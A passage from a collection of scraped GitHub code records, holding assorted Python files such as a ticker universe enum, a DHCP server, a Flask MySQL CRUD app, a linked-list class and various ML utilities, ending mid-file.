FUTURES\r\nES1: E-mini S&P 500 futures contract traded on the Chicago Mercantile\r\nExchange (CME).\r\nYM1: E-mini Dow Jones Industrial Average futures contract traded on the CME.\r\nNQ1: E-mini Nasdaq 100 futures contract traded on the CME.\r\nRTY1: E-mini Russell 2000 futures contract traded on the CME.\r\n\r\n\"\"\"\r\n\r\n\r\nclass Universe(Enum):\r\n    US_EQ_SECTOR = (\r\n        \"us_eq_sector\",\r\n        \"ETF\",\r\n        \"XLY.XLP.XLE.XLF.XLV.XLI.XLB.XLK.XBI.SMH.XLC.XLU.XME.GDX.XOP.XHB.XLRE.XRT\",\r\n    )\r\n    US_EQ_INDEX = (\"us_eq_index\", \"ETF\", \"SPY.QQQ.DIA.IWM\")\r\n    EQ_DEV_COUNTRY = (\r\n        \"eq_dev_country\",\r\n        \"ETF\",\r\n        \"EWA.EWC.EWQ.EWG.EWI.EWJ.EWP.EWU.EUFN.EWL\",\r\n    )\r\n    EQ_EM_COUNTRY = (\r\n        \"eq_em_country\",\r\n        \"ETF\",\r\n        \"FXI.KWEB.EWZ.EWW.EWS.EWY.EWT.INDA.EWH.EZA\",\r\n    )\r\n    US_FI_ETF = (\r\n        \"us_fi_etf\",\r\n        \"ETF\",\r\n        \"BIL.SHY.IEI.IEF.TLT.MBB.LQD.HYG.JNK.PCY.BOND\",\r\n    )\r\n    COMMO_ETF = (\"commo_etf\", \"ETF\", \"GLD.SLV.USO.UNG.DBA.DBC\")\r\n    US_EQ_IDX_FUT = (\"us_eq_idx_fut\", \"FUT\", \"ES1.YM1.NQ1.RTY1\")\r\n    FI_FUT = (\"fi_fut\", \"FUT\", \"ZT1.ZF1.ZN1.ZB1\")\r\n    PM_FUT = (\"pm_fut\", \"FUT\", \"GC1.SI1.PL1.PA1\")\r\n    ENERGY_FUT = (\"energy_fut\", \"FUT\", \"CL1.NG1.HO1.BZ1.RB1\")\r\n    FX_MAJOR_PAIRS = (\r\n        \"fx_major_pairs\",\r\n        \"FX\",\r\n        \"EURUSD.USDJPY.GBPUSD.AUDUSD.USDCAD.USDCHF.NZDUSD.USDMXN\",\r\n    )\r\n","repo_name":"lolay92/data-service","sub_path":"src/data_services/utils/universe.py","file_name":"universe.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}
+{"seq_id":"33709134419","text":"import json\r\nimport requests\r\nimport csv\r\n\r\nwith open('migration.json') as migration:\r\n    data = json.load(migration)\r\n\r\nrequest = f\"https://{data['serv']}:{data['gate']}\"\r\nresponse = requests.get(request)\r\n\r\n# a requests.Response object is not subscriptable; parse the JSON body first\r\nkind = response.json()[data['kind']]\r\n\r\nrows = []\r\n\r\nfor d in kind:\r\n    have = False\r\n    if d['size'] >= data['min_size']:\r\n        for i in range(len(rows)):\r\n            if d['place'] == rows[i]['place'] and d['size'] == rows[i]['size']:\r\n                rows[i]['total'] += d['amount']\r\n                have = True\r\n        if not have:\r\n            rows.
append({\r\n 'place': d['place'],\r\n 'size': d['size'],\r\n 'total': d['amount']\r\n })\r\n\r\nrows.sort(key=lambda x: (-x['total'], x['place']))\r\n\r\nwith open('butterflies.csv', 'w', newline='') as csvfile:\r\n writer = csv.writer(csvfile, delimiter='*')\r\n writer.writerow(['place', 'size', 'total'])\r\n for i in rows:\r\n writer.writerow([i['place'], i['size'], i['total']])\r\n","repo_name":"AidarKa05/sr","sub_path":"SRp 2.py","file_name":"SRp 2.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20842008997","text":"import os\n\nfrom sqlalchemy import create_engine, Table, Column, MetaData\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy.types import Integer, String, Boolean, Text, DateTime\nfrom sqlalchemy.pool import StaticPool\n\nfrom datetime import datetime\n\n\n__all__ = [\n \"Model\",\n \"Account\",\n \"Question\",\n ]\n\n\nclass Model:\n meta = None # Table 集合, 只是 Initial\n engine = None # 存放連結 Database 的資訊, 只是 Initial\n conn = None # 與 Database 的連結, 透過這個下 SQL 指令, 只是 Initial\n\n @classmethod\n def start_engine(cls, db_uri=None):\n \"\"\"Intial Database 連結的資訊\"\"\"\n\n if db_uri is None or db_uri == \"sqlite:///:memory:\":\n cls.engine = create_engine(\n \"sqlite:///:memory:\",\n connect_args={'check_same_thread': False},\n poolclass=StaticPool,\n )\n else:\n cls.engine = create_engine(db_uri)\n\n @classmethod\n def initial_meta(cls):\n cls.meta = MetaData() # 紀錄 Database 有什麼\n\n Account.register(cls.meta) # 把 Account 註冊到 Meta\n Question.register(cls.meta) # 把 Question 註冊到 Meta\n\n cls.meta.create_all(cls.engine)\n \n @classmethod\n def connect(cls):\n \"\"\"開始與 Database 的連結\"\"\"\n\n cls.conn = cls.engine.connect()\n return cls.conn\n \n @classmethod\n def disconnect(cls):\n \"\"\"結束語 Database 的連結\"\"\"\n\n if cls.conn is not None:\n cls.conn.close()\n cls.conn = None\n\n\nclass Account:\n NAME = \"tb-account\" # Table 名字\n T = None # Table instance\n\n @classmethod\n def register(cls, meta):\n cls.T = Table(\n cls.NAME,\n meta,\n Column(\"id\", Integer, primary_key=True, autoincrement=True),\n Column(\"login_id\", String, nullable=False, autoincrement=False,\n unique=True), # NOT NULL\n Column(\"password\", String, nullable=False, autoincrement=False),\n Column(\"create_at\", DateTime, default=datetime.utcnow,\n autoincrement=True),\n )\n\n\nclass Question:\n NAME = \"tb-question\"\n T = None\n\n @classmethod\n def register(cls, meta):\n cls.T = Table(\n cls.NAME,\n meta,\n Column(\"id\", Integer, primary_key=True, autoincrement=True),\n Column(\"title\", String, nullable=False, autoincrement=False),\n Column(\"content\", Text, nullable=False, autoincrement=False),\n Column(\"writer\", String, nullable=False, autoincrement=False), # 不是 FK\n # Column(\"writer\", Integer, ForeignKey(\"tb-account.id\")),\n Column(\"create_at\", DateTime, default=datetime.now,\n autoincrement=True),\n )\n\n\nif __name__ == \"__main__\":\n Model.start_engine(\"sqlite:///test.db\")\n Model.initial_meta()\n\n if os.path.isfile(\"test.db\"):\n os.remove(\"test.db\")\n","repo_name":"panmpan17/Kangaroo","sub_path":"server/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29155693475","text":"#\n# >>> Escriba el codigo del reducer a partir de este punto <<<\n#\n\n#### !/usr/bin/env python\n\nimport sys\n\nfor line in sys.stdin:\n line = line.strip()\n value, key 
= line.split(',')\n print(f'{key},{value}')\n","repo_name":"analitica-de-grandes-datos/mapreduce-en-python-Dannyqp98","sub_path":"pregunta_03/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1231258149","text":"#학번 : 202104367\n#학과 : 컴퓨터공학과\n#이름 : 전상인\n# Node 클래스 정의\nclass Node:\n\tdef __init__(self, data):\n\t\tself.data = data\n\t\tself.next = None\n\n\n# LinkedList 클래스 정의\nclass LinkedList:\n\n\t# 초기화 메소드\n\tdef __init__(self):\n\t\tdummy = Node(\"dummy\")\n\t\tself.head = dummy\n\t\tself.tail = dummy\n\n\t\tself.current = None\n\t\tself.before = None\n\n\t\tself.num_of_data = 0\n\n\t# append 메소드 (insert - 맨 뒤에 노드 추가, tail과 node의 next, 데이터 개수 변경)\n\tdef append(self, data):\n\t\tnew_node = Node(data)\n\t\tself.tail.next = new_node\n\t\tself.tail = new_node\n\n\t\tself.num_of_data += 1\n\n\t# delete 메소드 (delete - current 노드 삭제, 인접 노드의 current, next 변경, 데이터 개수 변경)\n\tdef delete(self):\n\t\tpop_data = self.current.data\n\n\t\tif self.current is self.tail:\n\t\t\tself.tail = self.before\n\t\n\t\tself.before.next = self.current.next\n\t\t# 중요 : current가 next가 아닌 before로 변경된다.\n\t\tself.current = self.before \n\n\t\tself.num_of_data -= 1\n\n\t\treturn pop_data\n\n\t# first 메소드 (search1 - 맨 앞의 노드 검색, before, current 변경)\n\tdef first(self):\n\t\t# 데이터가 없는 경우 첫번째 노드도 없기 때문에 None 리턴\n\t\tif self.num_of_data == 0: \n\t\t\treturn None\n\n\t\tself.before = self.head\n\t\tself.current = self.head.next\n\n\t\treturn self.current.data\n\n\t# next 메소드 (search2 - current 노드의 다음 노드 검색, 이전에 first 메소드가 한번은 실행되어야 함)\n\tdef next(self):\n\t\tif self.current.next == None:\n\t\t\treturn None\n\n\t\tself.before = self.current\n\t\tself.current = self.current.next\n\n\t\treturn self.current.data\n\n\t# size 메소드\n\tdef size(self):\n\t\treturn self.num_of_data \n\t\n\tdef traverse_all(self):\n\t\tif self.num_of_data == 0:\n\t\t\tprint(\"Empty LinkedListT\")\n\t\t\treturn None\n\t\t\n\t\tself.first()\n\t\n\t\tprint('head',end='')\n\t\twhile self.current.next!= None: #조건을 self.current로 해놓으면 self.first() 함수가 current의 다음이 None일때 current와 before의 위치를 옮기지 않으므로 무한루프에 걸린다\n\t\t\tprint(f'-> {self.current.data} ',end='')\n\t\t\tself.next()\n\n\t\t#self.first() 함수가 current의 다음이 None일때 current와 before의 위치를 옮기지 않으므로 마지막 원소만 따로 처리해준다.\n\t\tprint(f'-> {self.current.data} -> null')\n\n\t\n\n\tdef insert_at(self, position, new_data):\n\t\tcount = 1\n\t\tnew_node = Node(new_data)\n\t\tself.first()\n\n\t\tif self.num_of_data == 0:\n\t\t\tprint(\"Empty LinkedListI\")\n\t\t\treturn None\n\t\t\n\t\tif position <= 0:\n\t\t\tprint(\"Position Input Error\")\n\t\t\treturn None\n\t\t\n\t\tif position > self.num_of_data :\n\t\t\tself.append(new_data)\n\t\t\tprint(\"Exceed Position. 
Append Data\")\n\n\t\telse:\n\t\t\twhile count != position:\n\t\t\t\tcount +=1\n\t\t\t\tself.next()\n\t\t\t\n\t\t\tself.before.next = new_node\n\t\t\tnew_node.next = self.current\n\t\t\tself.num_of_data +=1\n\n\n\t\t\n\tdef remove(self, key):\n\t\tself.first()\n\t\tpos = 1\n\t\tbefore_delete = self.num_of_data\n\n\t\tif self.num_of_data == 0:\n\t\t\tprint(\"Empty LinkedListR\")\n\t\t\treturn None\n\t\t\t\n\t\twhile self.current.next != None:\n\t\t\tif key == self.current.data:\n\t\t\t\tself.delete()\n\t\t\t\tprint(f\"{pos}번째 데이터를 삭제합니다.\")\n\n\t\t\tself.next()\n\t\t\tpos += 1\n\t\tif self.current.data == key:\n\t\t\tself.delete()\n\t\t\tprint(f\"{pos}번째 데이터를 삭제합니다.\")\n\t\t\n\t\tif before_delete == self.num_of_data:\n\t\t\tprint(\"해당하는 원소가 없습니다.\")","repo_name":"gsi1324/DSJupyter","sub_path":"myssl.py","file_name":"myssl.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2583378581","text":"import os\nimport numpy as np\nfrom torch.utils.data import Dataset\nimport torchaudio\nimport random\n\nclass LJSpeechDataset(Dataset):\n def __init__(self, df):\n self.dir = \"LJSpeech-1.1/wavs\"\n self.paths = df.index.values\n\n def __len__(self):\n return len(self.paths)\n\n def __getitem__(self, index):\n path = os.path.join(self.dir, f'{self.paths[index]}.wav')\n wav, sr = torchaudio.load(path)\n wav = wav.squeeze()\n if wav.shape[0] <= 20000:\n pad_wav = torch.full((20000, ), fill_value=0.0)\n pad_wav[:wav.shape[1]] = wav[:wav.shape[1]]\n output_wav = pad_wav\n else:\n rand_pos = random.randint(0, wav.shape[0] - 20000)\n output_wav = wav[rand_pos:rand_pos + 20000]\n return output_wav\n","repo_name":"VladaTrus/dla_hw_5","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7394306330","text":"import configparser\nimport misc\nimport sys\nimport db\nfrom resolver import DHCPDeclineResolver, DHCPDiscoverResolver, \\\n DHCPInformResolver, DHCPReleaseResolver, \\\n DHCPReleaseResolver, DHCPRequestResolver\nfrom socket import socket, AF_INET, SOCK_DGRAM, SOL_SOCKET, SO_REUSEADDR, \\\n SO_REUSEPORT, SOL_IP, IP_MULTICAST_TTL, IP_MULTICAST_LOOP, \\\n IP_MULTICAST_IF, inet_aton, SHUT_RD, gethostbyname, gethostname, \\\n SO_BROADCAST\n\nclass DHCPServer:\n def __init__(self):\n self.log = misc.getLogger(__class__.__name__)\n self.log.info('Starting DHCP server initialization...')\n self.config = configparser.ConfigParser()\n self.config.read('config.ini')\n if not self.config.sections():\n self.log.critical('Configuration file not found or its invalid. 
' \\\n 'Please provide correct config.ini file.')\n sys.exit(-1)\n self.log.info('Configuration loaded successfully')\n self.process = True\n self.db = db.InMemoryDHCPDatabase()\n self._setup()\n\n def _setup(self):\n self.socket = socket(AF_INET, SOCK_DGRAM)\n self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)\n self.socket.setsockopt(SOL_SOCKET, SO_REUSEPORT, 1)\n self.socket.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)\n self.socket.setsockopt(SOL_IP, IP_MULTICAST_TTL, 20)\n self.socket.setsockopt(SOL_IP, IP_MULTICAST_LOOP, 1)\n \n def _dispatch(self, data, addr):\n pack = misc.getGeneralPacket(data)\n resolver = {}\n print(pack)\n if pack['options']['messageType'] == 'DISCOVER':\n self.log.info('Processing DISCOVER message.')\n resolver = DHCPDiscoverResolver(pack, self.config, self.db)\n resolver.resolve()\n elif pack['options']['messageType'] == 'REQUEST':\n self.log.info('Processing REQUEST message.')\n resolver = DHCPRequestResolver(pack, self.config, self.db)\n resolver.resolve()\n elif pack['options']['messageType'] == 'DECLINE':\n self.log.info('Processing DECLINE message.')\n resolver = DHCPDeclineResolver(pack, self.config, self.db)\n resolver.resolve()\n elif pack['options']['messageType'] == 'RELEASE':\n self.log.info('Processing RELEASE message.')\n resolver = DHCPReleaseResolver(pack, self.config, self.db)\n resolver.resolve()\n return\n elif pack['options']['messageType'] == 'INFORM':\n self.log.info('Processing INFORM message.')\n resolver = DHCPInformResolver(pack, self.config, self.db)\n resolver.resolve()\n self._sendPacket(resolver.toBytes(), addr)\n \n def _sendPacket(self, data, addr):\n sendsock = socket(AF_INET, SOCK_DGRAM)\n sendsock.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)\n sendsock.bind((self.config['zone']['server'], 0))\n sendsock.sendto(data, ('', 68))\n sendsock.close()\n\n def listen(self):\n self.socket.bind(('', 67))\n self.log.info('Sever started. Waiting for connections...')\n while self.process:\n data, client_addr = self.socket.recvfrom(1024)\n self.log.info(\"Received broadcast message on port 67\")\n self._dispatch(data, client_addr)\n self.socket.close()\n\n def shutdown(self):\n self.log.info(\"Gracefully stopping listening...\")\n try:\n self.socket.shutdown(SHUT_RD)\n except OSError:\n pass\n self.log.info(\"Server stopped.\")\n\nif __name__ == '__main__':\n print('This file is not intended to run separately. 
Run main.py file instead.')\n","repo_name":"Norbitor/ndhcp","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34416695885","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport hydrogeosines as hgs\n\n#%% test the model\ntest = hgs.site('TEST', geoloc=[141.762065, -31.065781, 160])\n\n#%%\nhello = test.import_csv('test_data/fowlers_gap/acworth_short.csv', dt_fmt='%d/%m/%Y %H:%M')\nprint(hello)\n\n#%%\ncorrected = test.correct(et_method='hals', et=True)\nprint(corrected)\n\n#%%\nhello1 = test.calc_BE(method='acworth')\nprint(hello1)\n\n#%%\nhello1 = test.calc_BE(method='rau')\nprint(hello1)\n\n#%%\ntest.export_results('corrected.csv')\n\nanalysis\ndata\nprocessing\n\n\nsite.analysis.calc_BE()\nsite.data","repo_name":"HydroGeoSines/HydroGeoSines","sub_path":"tests/test_correct_v1.py","file_name":"test_correct_v1.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"78"} +{"seq_id":"5610873986","text":"from common import Proxy\nimport cv2\nimport os\nimport io\nfrom PIL import Image\n\nPATH = \"/mnt/data/\"\nclass CollectCache(object):\n def __init__(self, *args, **kwargs):\n self.initialize()\n super(CollectCache, self).__init__(*args, **kwargs)\n\n def initialize(self):\n if not os.path.exists(PATH + \"dataset/images\"):\n os.makedirs(PATH + \"dataset/images\")\n os.makedirs(PATH + \"dataset/depths\")\n self.lastIndex = len([name for name in os.listdir(PATH + 'dataset/images') if os.path.isfile(os.path.join(PATH + 'dataset/images', name))])\n\n\n def collect_observation(self, observation, position, rotation):\n index = self.lastIndex + 1\n\n Image.fromarray(observation[0]).save(PATH + \"dataset/images/%s.png\" % index)\n Image.fromarray(observation[1]).save(PATH + \"dataset/depths/%s.png\" % index)\n with open(PATH + \"dataset/info.txt\", \"a+\") as f:\n f.write(u\"%s %s %s %s %s %s %s %s %s %s\\n\" % ((index,) + (position[0], position[1], rotation,) + (observation[2][0], observation[2][1], observation[3][2]) + observation[4]))\n f.flush()\n self.lastIndex = index\n pass\n\ncache = CollectCache()\n\ndef make_file_dataset(navigator):\n oldCollect = navigator.collect\n def collect(observation, position, rotation, *args, **kwargs):\n oldCollect(observation, position, rotation, *args, **kwargs)\n cache.collect_observation(observation, position, rotation)\n navigator.collect = collect\n return navigator\n\n # class NavigatorProxy(Proxy):\n # def __init__(self, *args, **kwargs):\n # super(NavigatorProxy, self).__init__(*args, **kwargs)\n\n # def __getattribute__(self, name):\n # if name == \"collect\":\n # return collect\n # return super(NavigatorProxy, self).__getattribute__(name)\n \n # return NavigatorProxy(navigator)\n ","repo_name":"jkulhanek/robot-visual-navigation","sub_path":"ros/src/map_collector/src/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"78"} +{"seq_id":"14165891812","text":"import torch\nimport torch.distributed as dist\nimport argparse\nimport utils\n\n\ndef get_args_parser():\n parser = argparse.ArgumentParser('Distributed training')\n # parser.add_argument('--local_rank', type=int, default=0)\n parser.add_argument('--world_size', type=int, default=1)\n 
parser.add_argument('--backend', type=str, default='nccl')\n parser.add_argument(\"--dist-url\", type=str, default=\"env://\")\n parser.add_argument(\"--sync-bn\", action=\"store_true\")\n \n return parser.parse_args()\n\n\ndef main():\n args = get_args_parser()\n utils.init_distributed_mode(args, disable_print=False)\n \n rank = utils.get_rank()\n torch.manual_seed(rank + 123)\n t = torch.randint(0, 10, (2,3)).to(\"cuda\")\n print(f\"Rank {rank} has tensor {t}\")\n print(\"---------------------------------------------------\")\n \n # t = utils.reduce_across_processes(t)\n dist.all_reduce(t, op=dist.ReduceOp.SUM)\n print(f\"Rank {rank} has reduced tensor {t}\")\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mr-Philo/Torch_Distributed","sub_path":"2-DataParallel/test_all_reduce.py","file_name":"test_all_reduce.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"12031648441","text":"from typing import cast\n\nimport pytest\nfrom sqlglot import parse_one, select\nfrom sqlglot.expressions import Select\n\nfrom featurebyte.enum import DBVarType, SourceType\nfrom featurebyte.query_graph.node.schema import TableDetails\nfrom featurebyte.query_graph.sql.adapter import SnowflakeAdapter, SparkAdapter, get_sql_adapter\n\n\n@pytest.mark.parametrize(\n \"dtype, expected\",\n [\n (DBVarType.FLOAT, \"FLOAT\"),\n (DBVarType.INT, \"FLOAT\"),\n (DBVarType.VARCHAR, \"VARCHAR\"),\n (DBVarType.OBJECT, \"OBJECT\"),\n (DBVarType.BINARY, \"VARIANT\"),\n (DBVarType.ARRAY, \"ARRAY\"),\n ],\n)\ndef test_get_online_store_type_from_dtype(dtype, expected):\n \"\"\"\n Test get_online_store_type_from_dtype for SnowflakeAdapter\n \"\"\"\n assert SnowflakeAdapter.get_physical_type_from_dtype(dtype) == expected\n\n\n@pytest.mark.parametrize(\n \"query, expected\",\n [\n (\"SELECT abc as A\", \"SELECT abc as A\"),\n (\"SELECT 'abc' as A\", \"SELECT ''abc'' as A\"),\n (\"SELECT ''abc'' as A\", \"SELECT ''abc'' as A\"),\n ],\n)\ndef test_escape_quote_char__snowflake(query, expected):\n \"\"\"\n Test escape_quote_char for SnowflakeAdapter\n \"\"\"\n assert SnowflakeAdapter.escape_quote_char(query) == expected\n\n\n@pytest.mark.parametrize(\n \"query, expected\",\n [\n (\"SELECT abc as A\", \"SELECT abc as A\"),\n (\"SELECT 'abc' as A\", \"SELECT \\\\'abc\\\\' as A\"),\n (\"SELECT \\\\'abc\\\\' as A\", \"SELECT \\\\'abc\\\\' as A\"),\n ],\n)\ndef test_escape_quote_char__spark(query, expected):\n \"\"\"\n Test escape_quote_char for SparkAdapter\n \"\"\"\n assert SparkAdapter.escape_quote_char(query) == expected\n\n\n@pytest.mark.parametrize(\n \"source_type, expected\",\n [\n (\n SourceType.SNOWFLAKE,\n 'CREATE TABLE \"db1\".\"schema1\".\"table1\" AS SELECT * FROM A',\n ),\n (\n SourceType.SPARK,\n \"CREATE TABLE `db1`.`schema1`.`table1` USING DELTA TBLPROPERTIES ('delta.columnMapping.mode'='name', 'delta.minReaderVersion'='2', 'delta.minWriterVersion'='5') AS SELECT * FROM A\",\n ),\n (\n SourceType.DATABRICKS,\n \"CREATE TABLE `db1`.`schema1`.`table1` USING DELTA TBLPROPERTIES ('delta.columnMapping.mode'='name', 'delta.minReaderVersion'='2', 'delta.minWriterVersion'='5') AS SELECT * FROM A\",\n ),\n ],\n)\ndef test_create_table_as(source_type, expected):\n \"\"\"\n Test create_table_as for Adapter\n \"\"\"\n\n table_details = TableDetails(\n database_name=\"db1\",\n schema_name=\"schema1\",\n table_name=\"table1\",\n )\n expr = parse_one(\"SELECT * FROM A\")\n new_expr = 
get_sql_adapter(source_type).create_table_as(table_details, cast(Select, expr))\n assert new_expr.sql(dialect=source_type).strip() == expected\n\n\n@pytest.mark.parametrize(\n \"column_name, will_be_quoted\",\n [\n (\"CUSTOMER_ID\", False),\n (\"CUSTOMER_ID_123\", False),\n (\"_CUSTOMER_ID\", False),\n (\"_CUSTOMER$ID\", False),\n (\"1CUSTOMER$ID\", True),\n (\"$CUSTOMER_ID\", True),\n (\"customerID\", True),\n (\"123\", True),\n ],\n)\ndef test_will_pivoted_column_name_be_quoted(column_name, will_be_quoted):\n \"\"\"\n Test will_pivoted_column_name_be_quoted for SnowflakeAdapter\n \"\"\"\n assert SnowflakeAdapter.will_pivoted_column_name_be_quoted(column_name) is will_be_quoted\n\n\n@pytest.mark.parametrize(\n \"percent, expected_format\",\n [\n (10.01, \"10.01\"),\n (10.0, \"10\"),\n (10, \"10\"),\n (0.1, \"0.1\"),\n (0.000001, \"0.000001\"),\n (0.000000001, \"0.000000001\"),\n ],\n)\ndef test_tablesample_percentage_formatting(percent, expected_format):\n \"\"\"\n Test the percentage in TABLESAMPLE is not formatted using scientific notation because that is\n not supported in some engines like Spark\n \"\"\"\n out = SnowflakeAdapter.tablesample(select(\"*\").from_(\"A\"), percent).sql()\n expected = f\"SELECT * FROM (SELECT * FROM A) TABLESAMPLE({expected_format})\"\n assert out == expected\n","repo_name":"featurebyte/featurebyte","sub_path":"tests/unit/query_graph/test_adapter.py","file_name":"test_adapter.py","file_ext":"py","file_size_in_byte":3995,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"78"} +{"seq_id":"21076768057","text":"# Если в функцию передаётся кортеж, то посчитать длину всех его слов.\r\n# Если список, то посчитать кол-во букв и чисел в нём.\r\n# Число – кол-во нечётных цифр.\r\n# Строка – кол-во букв.\r\n# Сделать проверку со всеми этими случаями.\r\n\r\ndef identify(xxx):\r\n# если тип объекта кортеж - считаем длинну всех слов\r\n if isinstance(xxx, tuple):\r\n n = 0 # длинна всех слов\r\n for i in xxx:\r\n s = 0\r\n if type(i) is str:\r\n s = len(i)\r\n n += s\r\n print('Тип данных - кортеж')\r\n print('Длинна всех слов = ', n)\r\n\r\n# если тип объекта список - считаем количество чисел и букв\r\n if isinstance(xxx, list):\r\n k = 0 # буквы\r\n n = 0 # числа\r\n for i in xxx:\r\n if type(i) is str:\r\n for j in i:\r\n k += 1\r\n if type(i) is int:\r\n for j in str(i):\r\n n += 1\r\n print('Тип данных - список')\r\n print('Количество букв = ', k, 'количество цифр = ', n)\r\n\r\n\r\n# если тип объекта число (целое или дробное) - считаем количество нечетных чисел\r\n if (isinstance(xxx, int)) or (isinstance(xxx, float)):\r\n my_chislo = str(xxx)\r\n k = 0\r\n for i in my_chislo:\r\n if i.isdigit():\r\n if (int(i) / 2) != (int(i) // 2):\r\n k += 1\r\n print('тип данных - число')\r\n print('количество нечетных чисел - ', k)\r\n\r\n# если тип объекта сторока - считаем количество букв\r\n if isinstance(xxx, str):\r\n k = 0 # буквы\r\n for i in xxx:\r\n if i.isalpha():\r\n k += 1\r\n print('тип данных - сторока')\r\n print('Количество букв = ', k)\r\n\r\n# присваиваем объекту данные\r\nkkk = 'kla4ss 24 privet'\r\n\r\nidentify(kkk)\r\n","repo_name":"ssheshka/115_Group_SheshkaS","sub_path":"v2_home_.py","file_name":"v2_home_.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36528289519","text":"import os\nimport psutil\nfrom configobj import ConfigObj\n\nconfig = ConfigObj('/BLACKBOX/NetOpp/config/config.properties')\nvd = 
config.get('videosDirectory')\npathLog = config.get('pathLog')\ndu = int(config.get('diskUsage'))\n\nperAtual = int(psutil.disk_usage('/')[3])\n\nif perAtual > du:\n lines = open(pathLog, \"r\").readlines()\n cont = -1\n while perAtual > du:\n cont = cont + 1\n try:\n os.remove(lines[cont][:-1])\n except:\n pass\n perAtual = int(psutil.disk_usage('/')[3])\n videos = open(pathLog, \"w\")\n videos.writelines(lines[cont+1:])\n videos.close()","repo_name":"Garrocho/Net-Opp","sub_path":"BlackBox/verifica-espaco.py","file_name":"verifica-espaco.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"42017078375","text":"from flask import Flask, render_template, request, redirect, url_for\nfrom flask_mysqldb import MySQL\n\napp = Flask(__name__)\n\napp.config['MYSQL_HOST'] = 'localhost' \napp.config['MYSQL_USER'] = 'Reisita' \napp.config['MYSQL_PASSWORD'] = '1234' \napp.config['MYSQL_DB'] = 'database' \n\nmysql = MySQL(app)\n\nwith app.app_context():\n cur = mysql.connection.cursor()\n cur.execute('''\n CREATE TABLE IF NOT EXISTS usuarios (\n id INT AUTO_INCREMENT PRIMARY KEY,\n nombre VARCHAR(100) NOT NULL,\n email VARCHAR(120) UNIQUE NOT NULL,\n edad INT\n )\n ''')\n mysql.connection.commit()\n cur.close()\n\n \n@app.route('/')\ndef index():\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM usuarios')\n usuarios = cur.fetchall()\n cur.close()\n return render_template('index.html', usuarios=usuarios)\n\n \n@app.route('/add', methods=['GET', 'POST'])\ndef add_user():\n if request.method == 'POST':\n nombre = request.form['nombre']\n email = request.form['email']\n edad = request.form['edad']\n cur = mysql.connection.cursor()\n cur.execute('INSERT INTO usuarios (nombre, email, edad) VALUES (%s, %s, %s)', (nombre, email, edad))\n mysql.connection.commit()\n cur.close()\n return redirect(url_for('index'))\n return render_template('add.html')\n\n@app.route('/edit/', methods=['GET', 'POST'])\ndef edit_user(user_id):\n cur = mysql.connection.cursor()\n cur.execute('SELECT * FROM usuarios WHERE id = %s', (user_id,))\n user = cur.fetchone()\n cur.close()\n\n if request.method == 'POST':\n nombre = request.form['nombre']\n email = request.form['email']\n edad = request.form['edad']\n cur = mysql.connection.cursor()\n cur.execute('UPDATE usuarios SET nombre = %s, email = %s, edad = %s WHERE id = %s', (nombre, email, edad, user_id))\n mysql.connection.commit()\n cur.close()\n return redirect(url_for('index'))\n return render_template('edit.html', user=user)\n\n@app.route('/delete/', methods=['POST'])\ndef delete_user(user_id):\n cur = mysql.connection.cursor()\n cur.execute('DELETE FROM usuarios WHERE id = %s', (user_id,))\n mysql.connection.commit()\n cur.close()\n return redirect(url_for('index'))\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"gavi2004/tarea_programacion","sub_path":"App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14417944680","text":"import dlib\nimport sys\nimport cv2\nimport imutils\nfrom imutils import face_utils\nimport os\nimport xml.etree.ElementTree as ET\n\n\nf1 = './NewImages8.xml'\nf = './Immmmmge.xml'\n\nf2 = './NewImages8Summ.xml'\n\ntree = ET.parse(f)\ntree2 = ET.parse(f1)\n\nroot = tree.getroot()\nroot2 = tree2.getroot()\n\nimages_root = root.find('images')\nimages_root2 = root2.find('images')\nimages_root3 = 
